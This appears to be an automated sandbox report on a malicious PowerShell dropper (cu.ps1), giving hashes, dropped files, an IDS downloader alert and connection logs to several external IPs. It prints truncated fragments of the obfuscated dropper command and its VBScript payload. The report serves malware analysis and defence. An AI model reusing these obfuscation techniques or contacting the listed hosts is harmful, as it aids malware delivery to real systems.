                                                                          • 93.95.216.175
                                                                          • 148.251.114.233
                                                                          • 184.171.244.231
                                                                          Qsgtknmtt.exeGet hashmaliciousUnknownBrowse
                                                                          • 91.193.42.13
                                                                          • 93.95.216.175
                                                                          • 148.251.114.233
                                                                          • 184.171.244.231
                                                                          Fzcaaz.exeGet hashmaliciousUnknownBrowse
                                                                          • 91.193.42.13
                                                                          • 93.95.216.175
                                                                          • 148.251.114.233
                                                                          • 184.171.244.231
                                                                          Ekyrfzxogk.exeGet hashmaliciousUnknownBrowse
                                                                          • 91.193.42.13
                                                                          • 93.95.216.175
                                                                          • 148.251.114.233
                                                                          • 184.171.244.231

                                                                          Dropped Files

                                                                          No context

                                                                          Created / dropped Files

                                                                          C:\Users\Public\tq5.vbs

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with very long lines (316), with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):29287
                                                                          Entropy (8bit):5.16757071229696
                                                                          Encrypted:false
                                                                          SSDEEP:768:5Yf48SKT1nPeL9GLfqAQnS71KcNrx182u+:504lKT1P0yfqAuiNbtu+
                                                                          MD5:8DF76AF54C38D5D4C2CD9F6D18EEDF92
                                                                          SHA1:B21C95EBF34440AD8DA30F6E4FE25BADB871D61A
                                                                          SHA-256:2FD9440E21ADF91473719E9FB085F4D47A1D5AFCF02333A7F04D2A0F4D0B1C77
                                                                          SHA-512:8DBBDBC575A292890F1B1BB8AEDA916A958225B11739075B447AE7CE64774C678C45B071F0FBB91460BB218409E026ECFCF05740DAD8EB059B773C990D57FB09
                                                                          Malicious:true
                                                                          Reputation:low
                                                                          Preview:......Function Seasoning(Ambrain)......Publikummetbatfowl = Mid(MidB(Command, 44, 213),21,25)....Seasoning = ChrW(Ambrain)....Opskreknivsplid = Command ......End Function ....elektroingenirerne = LenB("Sardinieren") ..elektroingenirerne = elektroingenirerne xor clng(6932161) ...... ..Sorting137 = 0.... ..Pinligstes= array(65+5+0,69,77,59,72,73,62,59,66,66)......Kopvisdislocatedavic = Log(Len("Frihedsbevgelserne"))....Private Const Kbesum = 49485..Private Const Cornbird = 16348..Private Const Nyderes = "Pandaer verificative133 knopskydning,"..Private Const Terrorize = "Postansvarlige skjorternes"..Private Const Danseorkesteret = "Myndigstes150 exculpate trykkeriers puromucous"..Private Const Unignorant = &HF76C..Private Const Iodinophilous = -9045..Private Const Polyautography = 22989..Private Const Divisibly = -6735..Private Const Takeups = &H8FE6..Private Const Inductance = &H59DF..Private Const Thorax64 = -13300..Private Const Forkiness = &H96C8..Private Const Kondensatorers147 =

                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:modified
                                                                          Size (bytes):11608
                                                                          Entropy (8bit):4.890472898059848
                                                                          Encrypted:false
                                                                          SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                                          MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                                          SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                                          SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                                          SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                                          Malicious:false
                                                                          Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):64
                                                                          Entropy (8bit):1.1940658735648508
                                                                          Encrypted:false
                                                                          SSDEEP:3:NlllulL4w/l/lZ:NllUMwl/
                                                                          MD5:5E4245540CA0496B6A4E15149DB9B371
                                                                          SHA1:6F912443CDFD9F0C474E2ACC755E982C5E3CF8BB
                                                                          SHA-256:6892D98C8FEF52384104FB8712A0E1DA43C1B5CA8E7E32CF33200354E2FBC522
                                                                          SHA-512:1E61844BED5A7A30C6DE358CC6E351FFE6F783F27B5FAC2C4E71C2F9047D84C396C91E2B3264F043D03C41AAB179C7ADD3408AD68C966C1299827363DC3AF4B0
                                                                          Malicious:false
                                                                          Preview:@...e................................................@..........

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_15nbrj13.ban.psm1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c0nqjwma.x4l.ps1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dqytk0t0.xf5.ps1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gx1ct2n3.ceu.psm1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gxu2dunj.fqf.psm1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sqpcym1l.ibm.ps1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t1zo2zqi.b05.psm1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w3fbt4ma.uci.ps1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDesusertions\502SVHMMYCE5DZ8024I6.temp

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):6220
                                                                          Entropy (8bit):3.722661052957014
                                                                          Encrypted:false
                                                                          SSDEEP:96:tw/mCKQVkLgkvhkvCCtg422XDHL422zDHF:tw/8cqsg4l43
                                                                          MD5:D3893E8F15702976573D241FFA55B71B
                                                                          SHA1:11DCEF90B4136D10DE72A13D051E407BD295171D
                                                                          SHA-256:7DEEE018D2A91F02B31B53DB8824472A59B1441A477AEBB0E55BF241AFBD6FA7
                                                                          SHA-512:1FA5131A47FD7E011D088E20425FA54F14169E3B6A53E7075999629402DE8400AF08ACACDCECC5C933E276D30638821A38970A6EFB85AD5FC960199A5B9043D3
                                                                          Malicious:false
                                                                          Preview:...................................FL..................F.".. ....'GDj.../-...F..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......bBDj....&*..F.._....F......t...CFSF..1.....EWsG..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EWsG.Y.L..........................=...A.p.p.D.a.t.a...B.V.1......Y.L..Roaming.@......EWsG.Y.L..............................R.o.a.m.i.n.g.....\.1.....EWiI..MICROS~1..D......EWsG.Y.L..........................p.q.M.i.c.r.o.s.o.f.t.....V.1.....EW.J..Windows.@......EWsG.Y.L..........................OP..W.i.n.d.o.w.s.......1.....EWuG..STARTM~1..n......EWsG.Y.L....................D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW.I..Programs..j......EWsG.Y.L....................@.....?5..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EWsGEWsG..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EWsG.Y.L................

                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDesusertions\590aee7bdd69b59b.customDesusertions-ms (copy)

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):6220
                                                                          Entropy (8bit):3.722661052957014
                                                                          Encrypted:false
                                                                          SSDEEP:96:tw/mCKQVkLgkvhkvCCtg422XDHL422zDHF:tw/8cqsg4l43
                                                                          MD5:D3893E8F15702976573D241FFA55B71B
                                                                          SHA1:11DCEF90B4136D10DE72A13D051E407BD295171D
                                                                          SHA-256:7DEEE018D2A91F02B31B53DB8824472A59B1441A477AEBB0E55BF241AFBD6FA7
                                                                          SHA-512:1FA5131A47FD7E011D088E20425FA54F14169E3B6A53E7075999629402DE8400AF08ACACDCECC5C933E276D30638821A38970A6EFB85AD5FC960199A5B9043D3
                                                                          Malicious:false
                                                                          Preview:...................................FL..................F.".. ....'GDj.../-...F..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......bBDj....&*..F.._....F......t...CFSF..1.....EWsG..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EWsG.Y.L..........................=...A.p.p.D.a.t.a...B.V.1......Y.L..Roaming.@......EWsG.Y.L..............................R.o.a.m.i.n.g.....\.1.....EWiI..MICROS~1..D......EWsG.Y.L..........................p.q.M.i.c.r.o.s.o.f.t.....V.1.....EW.J..Windows.@......EWsG.Y.L..........................OP..W.i.n.d.o.w.s.......1.....EWuG..STARTM~1..n......EWsG.Y.L....................D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW.I..Programs..j......EWsG.Y.L....................@.....?5..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EWsGEWsG..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EWsG.Y.L................

                                                                          Static File Info

                                                                          General

                                                                          File type:ASCII text, with very long lines (825), with no line terminators
                                                                          Entropy (8bit):5.334341278487085
                                                                          TrID:
                                                                            File name:cu.ps1
                                                                            File size:825 bytes
                                                                            MD5:ffe670c96b95f411565aad0ed1bd8826
                                                                            SHA1:2069824f37cedac9e4ac4fdd68cbdf9903469d25
                                                                            SHA256:981751d5f3e0745c63ebbb34a2007ad61bc16c407f57173cb5f315e9ec9e5972
                                                                            SHA512:34ba588c5b27e9f6852155d34a217d7a69b8e012fb96c12c0b2bda0ac0968de95687737abdef378fef9499d182085ab751d1c292aae450f750f3709346d54f0d
                                                                            SSDEEP:24:XaMNik5MNAVjWIOLWH1LT11QWAa6Kzkuzoo:n3KImWh1YKzkeoo
                                                                            TLSH:3D014149915A9AF35A90F69620C86D3E3235C60AA1FD00B3FAF4464714BDA7D0AC2D77
                                                                            File Content Preview:powershell -win hidden $njqoyt=iex($('[Environment]::GetEq9ps'''.Replace('q9p','nvironmentVariable(''public'') + ''\\ik473a.vb')));$flol=iex($('[Environment]::GetEq9ps'''.Replace('q9p','nvironmentVariable(''public'') + ''\\tq5.vb')));function getit([strin

                                                                            File Icon

                                                                            Icon Hash:3270d6baae77db44

                                                                            Network Behavior

                                                                            Suricata IDS Alerts

                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                            2024-12-05T10:39:40.070592+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949712184.171.244.231443TCP

                                                                            Network Port Distribution

                                                                            TCP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Dec 5, 2024 10:39:25.030869961 CET49709443192.168.2.993.95.216.175
                                                                            Dec 5, 2024 10:39:25.030927896 CET4434970993.95.216.175192.168.2.9
                                                                            Dec 5, 2024 10:39:25.031007051 CET49709443192.168.2.993.95.216.175
                                                                            Dec 5, 2024 10:39:25.041688919 CET49709443192.168.2.993.95.216.175
                                                                            Dec 5, 2024 10:39:25.041718006 CET4434970993.95.216.175192.168.2.9
                                                                            Dec 5, 2024 10:39:26.521923065 CET4434970993.95.216.175192.168.2.9
                                                                            Dec 5, 2024 10:39:26.522000074 CET49709443192.168.2.993.95.216.175
                                                                            Dec 5, 2024 10:39:26.550317049 CET49709443192.168.2.993.95.216.175
                                                                            Dec 5, 2024 10:39:26.550353050 CET4434970993.95.216.175192.168.2.9
                                                                            Dec 5, 2024 10:39:26.550867081 CET4434970993.95.216.175192.168.2.9
                                                                            Dec 5, 2024 10:39:26.572042942 CET49709443192.168.2.993.95.216.175
                                                                            Dec 5, 2024 10:39:26.615324974 CET4434970993.95.216.175192.168.2.9
                                                                            Dec 5, 2024 10:39:27.237313032 CET4434970993.95.216.175192.168.2.9
                                                                            Dec 5, 2024 10:39:27.237344027 CET4434970993.95.216.175192.168.2.9
                                                                            Dec 5, 2024 10:39:27.237430096 CET49709443192.168.2.993.95.216.175
                                                                            Dec 5, 2024 10:39:27.237452984 CET4434970993.95.216.175192.168.2.9
                                                                            Dec 5, 2024 10:39:27.286597967 CET49709443192.168.2.993.95.216.175
                                                                            Dec 5, 2024 10:39:27.286618948 CET4434970993.95.216.175192.168.2.9
                                                                            Dec 5, 2024 10:39:27.333475113 CET49709443192.168.2.993.95.216.175
                                                                            Dec 5, 2024 10:39:27.350109100 CET4434970993.95.216.175192.168.2.9
                                                                            Dec 5, 2024 10:39:27.350131035 CET4434970993.95.216.175192.168.2.9
                                                                            Dec 5, 2024 10:39:27.350136995 CET4434970993.95.216.175192.168.2.9
                                                                            Dec 5, 2024 10:39:27.350184917 CET49709443192.168.2.993.95.216.175
                                                                            Dec 5, 2024 10:39:27.350229025 CET49709443192.168.2.993.95.216.175
                                                                            Dec 5, 2024 10:39:27.350236893 CET4434970993.95.216.175192.168.2.9
                                                                            Dec 5, 2024 10:39:27.395981073 CET49709443192.168.2.993.95.216.175
                                                                            Dec 5, 2024 10:39:27.448831081 CET4434970993.95.216.175192.168.2.9
                                                                            Dec 5, 2024 10:39:27.448842049 CET4434970993.95.216.175192.168.2.9
                                                                            Dec 5, 2024 10:39:27.448944092 CET4434970993.95.216.175192.168.2.9
                                                                            Dec 5, 2024 10:39:27.448980093 CET49709443192.168.2.993.95.216.175
                                                                            Dec 5, 2024 10:39:27.449021101 CET49709443192.168.2.993.95.216.175
                                                                            Dec 5, 2024 10:39:27.473797083 CET4434970993.95.216.175192.168.2.9
                                                                            Dec 5, 2024 10:39:27.473807096 CET4434970993.95.216.175192.168.2.9
                                                                            Dec 5, 2024 10:39:27.473828077 CET4434970993.95.216.175192.168.2.9
                                                                            Dec 5, 2024 10:39:27.473859072 CET49709443192.168.2.993.95.216.175
                                                                            Dec 5, 2024 10:39:27.473913908 CET49709443192.168.2.993.95.216.175
                                                                            Dec 5, 2024 10:39:27.499125957 CET4434970993.95.216.175192.168.2.9
                                                                            Dec 5, 2024 10:39:27.499140024 CET4434970993.95.216.175192.168.2.9
                                                                            Dec 5, 2024 10:39:27.499198914 CET49709443192.168.2.993.95.216.175
                                                                            Dec 5, 2024 10:39:27.499247074 CET49709443192.168.2.993.95.216.175
                                                                            Dec 5, 2024 10:39:27.499253035 CET4434970993.95.216.175192.168.2.9
                                                                            Dec 5, 2024 10:39:27.542119980 CET4434970993.95.216.175192.168.2.9
                                                                            Dec 5, 2024 10:39:27.542162895 CET4434970993.95.216.175192.168.2.9
                                                                            Dec 5, 2024 10:39:27.542237997 CET49709443192.168.2.993.95.216.175
                                                                            Dec 5, 2024 10:39:27.542249918 CET4434970993.95.216.175192.168.2.9
                                                                            Dec 5, 2024 10:39:27.583482027 CET49709443192.168.2.993.95.216.175
                                                                            Dec 5, 2024 10:39:27.628796101 CET4434970993.95.216.175192.168.2.9
                                                                            Dec 5, 2024 10:39:27.628807068 CET4434970993.95.216.175192.168.2.9
                                                                            Dec 5, 2024 10:39:27.628832102 CET4434970993.95.216.175192.168.2.9
                                                                            Dec 5, 2024 10:39:27.628891945 CET49709443192.168.2.993.95.216.175
                                                                            Dec 5, 2024 10:39:27.628942013 CET49709443192.168.2.993.95.216.175
                                                                            Dec 5, 2024 10:39:27.642954111 CET4434970993.95.216.175192.168.2.9
                                                                            Dec 5, 2024 10:39:27.642961979 CET4434970993.95.216.175192.168.2.9
                                                                            Dec 5, 2024 10:39:27.642985106 CET4434970993.95.216.175192.168.2.9
                                                                            Dec 5, 2024 10:39:27.643027067 CET49709443192.168.2.993.95.216.175
                                                                            Dec 5, 2024 10:39:27.643083096 CET49709443192.168.2.993.95.216.175
                                                                            Dec 5, 2024 10:39:27.661907911 CET4434970993.95.216.175192.168.2.9
                                                                            Dec 5, 2024 10:39:27.661916018 CET4434970993.95.216.175192.168.2.9
                                                                            Dec 5, 2024 10:39:27.662000895 CET49709443192.168.2.993.95.216.175
                                                                            Dec 5, 2024 10:39:27.662009001 CET4434970993.95.216.175192.168.2.9
                                                                            Dec 5, 2024 10:39:27.666394949 CET49709443192.168.2.993.95.216.175
                                                                            Dec 5, 2024 10:39:28.070544004 CET49710443192.168.2.991.193.42.13
                                                                            Dec 5, 2024 10:39:28.070596933 CET4434971091.193.42.13192.168.2.9
                                                                            Dec 5, 2024 10:39:28.070672989 CET49710443192.168.2.991.193.42.13
                                                                            Dec 5, 2024 10:39:28.071005106 CET49710443192.168.2.991.193.42.13
                                                                            Dec 5, 2024 10:39:28.071021080 CET4434971091.193.42.13192.168.2.9
                                                                            Dec 5, 2024 10:39:29.331828117 CET4434971091.193.42.13192.168.2.9
                                                                            Dec 5, 2024 10:39:29.331927061 CET49710443192.168.2.991.193.42.13
                                                                            Dec 5, 2024 10:39:29.355475903 CET49710443192.168.2.991.193.42.13
                                                                            Dec 5, 2024 10:39:29.355506897 CET4434971091.193.42.13192.168.2.9
                                                                            Dec 5, 2024 10:39:29.355901003 CET4434971091.193.42.13192.168.2.9
                                                                            Dec 5, 2024 10:39:29.357979059 CET49710443192.168.2.991.193.42.13
                                                                            Dec 5, 2024 10:39:29.399333000 CET4434971091.193.42.13192.168.2.9
                                                                            Dec 5, 2024 10:39:29.785850048 CET4434971091.193.42.13192.168.2.9
                                                                            Dec 5, 2024 10:39:29.833489895 CET49710443192.168.2.991.193.42.13
                                                                            Dec 5, 2024 10:39:29.833512068 CET4434971091.193.42.13192.168.2.9
                                                                            Dec 5, 2024 10:39:29.880379915 CET49710443192.168.2.991.193.42.13
                                                                            Dec 5, 2024 10:39:29.905942917 CET4434971091.193.42.13192.168.2.9
                                                                            Dec 5, 2024 10:39:29.905955076 CET4434971091.193.42.13192.168.2.9
                                                                            Dec 5, 2024 10:39:29.905992985 CET4434971091.193.42.13192.168.2.9
                                                                            Dec 5, 2024 10:39:29.906022072 CET49710443192.168.2.991.193.42.13
                                                                            Dec 5, 2024 10:39:29.906039953 CET4434971091.193.42.13192.168.2.9
                                                                            Dec 5, 2024 10:39:29.906052113 CET4434971091.193.42.13192.168.2.9
                                                                            Dec 5, 2024 10:39:29.906069040 CET49710443192.168.2.991.193.42.13
                                                                            Dec 5, 2024 10:39:29.906090021 CET4434971091.193.42.13192.168.2.9
                                                                            Dec 5, 2024 10:39:29.906104088 CET49710443192.168.2.991.193.42.13
                                                                            Dec 5, 2024 10:39:29.958487034 CET49710443192.168.2.991.193.42.13
                                                                            Dec 5, 2024 10:39:30.004580975 CET4434971091.193.42.13192.168.2.9
                                                                            Dec 5, 2024 10:39:30.004595041 CET4434971091.193.42.13192.168.2.9
                                                                            Dec 5, 2024 10:39:30.004623890 CET4434971091.193.42.13192.168.2.9
                                                                            Dec 5, 2024 10:39:30.004688978 CET49710443192.168.2.991.193.42.13
                                                                            Dec 5, 2024 10:39:30.004694939 CET4434971091.193.42.13192.168.2.9
                                                                            Dec 5, 2024 10:39:30.004724026 CET49710443192.168.2.991.193.42.13
                                                                            Dec 5, 2024 10:39:30.004748106 CET49710443192.168.2.991.193.42.13
                                                                            Dec 5, 2024 10:39:30.028963089 CET49710443192.168.2.991.193.42.13
                                                                            Dec 5, 2024 10:39:32.455209017 CET49711443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:39:32.455260038 CET44349711184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:39:32.455408096 CET49711443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:39:32.458355904 CET49711443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:39:32.458372116 CET44349711184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:39:33.724523067 CET44349711184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:39:33.724692106 CET49711443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:39:33.726996899 CET49711443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:39:33.727010965 CET44349711184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:39:33.727329016 CET44349711184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:39:33.736076117 CET49711443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:39:33.779335022 CET44349711184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:39:34.181077957 CET44349711184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:39:34.181169987 CET44349711184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:39:34.181227922 CET49711443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:39:34.184232950 CET49711443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:39:38.342300892 CET49712443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:39:38.342340946 CET44349712184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:39:38.342436075 CET49712443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:39:38.342749119 CET49712443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:39:38.342762947 CET44349712184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:39:39.602643013 CET44349712184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:39:39.604751110 CET49712443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:39:39.604789019 CET44349712184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:39:40.070583105 CET44349712184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:39:40.070653915 CET44349712184.171.244.231192.168.2.9
